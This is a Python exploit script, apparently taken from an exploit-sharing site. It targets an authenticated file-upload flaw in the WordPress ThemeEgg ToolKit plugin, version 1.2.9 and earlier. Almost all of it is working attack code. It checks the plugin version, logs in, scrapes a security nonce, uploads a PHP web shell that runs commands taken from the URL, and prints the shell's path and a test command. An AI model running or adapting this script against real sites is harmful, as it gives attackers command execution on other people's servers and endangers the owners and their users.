Share
## https://sploitus.com/exploit?id=1337DAY-ID-39947
import argparse
import re
import time
import requests
from bs4 import BeautifulSoup
#by Nxploit | Khaled Alenazi
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
def display_banner():
banner = """
..######..##.....##.########..........#######....#####....#######..########..........#######...#######...#######.....##...########
.##....##.##.....##.##...............##.....##..##...##..##.....##.##...............##.....##.##.....##.##.....##..####...##......
.##.......##.....##.##......................##.##.....##........##.##......................##.##.....##.##.....##....##...##......
.##.......##.....##.######...#######..#######..##.....##..#######..#######..#######..#######...#######...########....##...#######.
.##........##...##..##...............##........##.....##.##..............##.........##........##.....##........##....##.........##
.##....##...##.##...##...............##.........##...##..##........##....##.........##........##.....##.##.....##....##...##....##
..######.....###....########.........#########...#####...#########..######..........#########..#######...#######...######..######.
Exploit by : Khaled Alenazi ,Nxploit
"""
print(banner)
def check_version(url):
version_url = f"{url}/wp-content/plugins/themeegg-toolkit/readme.txt"
response = requests.get(version_url, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
if response.status_code == 200:
match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
if match and match.group(1) <= "1.2.9":
print(f"[+] Vulnerable version detected: {match.group(1)}")
time.sleep(3)
return True
print("[-] The target does not appear to be vulnerable.")
return False
def login(url, username, password, session):
login_url = f"{url}/wp-login.php"
login_data = {"log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In"}
response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
def get_security_nonce(url, session):
settings_page = session.get(f"{url}/wp-admin/themes.php?page=themeegg-toolkit", headers={"User-Agent": "Mozilla/5.0"})
soup = BeautifulSoup(settings_page.text, "html.parser")
for script in soup.find_all("script"):
match = re.search(r'"ajax_nonce":"(\w+)"', script.text)
if match:
return match.group(1)
return None
def exploit(url, username, password):
if not check_version(url):
return
if login(url, username, password, session):
print("[+] Logged in successfully.")
else:
print("[-] Failed to log in.")
return
nonce_value = get_security_nonce(url, session)
if not nonce_value:
print("[-] Failed to extract security nonce.")
return
print(f"[+] Found security nonce: {nonce_value}")
shell_code = "<?php system($_GET['cmd']); ?>"
files = {
"action": (None, "TETK_import_demo_data"),
"security": (None, nonce_value),
"customizer_file": ("shell.php", shell_code, "application/x-php")
}
upload_url = f"{url}/wp-admin/admin-ajax.php"
print("[*] Uploading Web Shell...")
response = session.post(upload_url, files=files, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
time.sleep(3)
if response.status_code == 200:
print("[+] Web Shell uploaded successfully!")
shell_path = f"{url}/wp-content/uploads/2025/03/shell.php"
print(f"[+] Potential Web Shell location: {shell_path}")
print(f"[*] Test command: {shell_path}?cmd=id")
else:
print("[-] File upload failed. Check if you have sufficient privileges or if there are additional protections.")
if __name__ == "__main__":
display_banner()
parser = argparse.ArgumentParser(description="Exploit for ThemeEgg ToolKit File Upload Vulnerability")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
parser.add_argument("-un", "--username", required=True, help="WordPress username")
parser.add_argument("-p", "--password", required=True, help="WordPress password")
args = parser.parse_args()
exploit(args.url, args.username, args.password)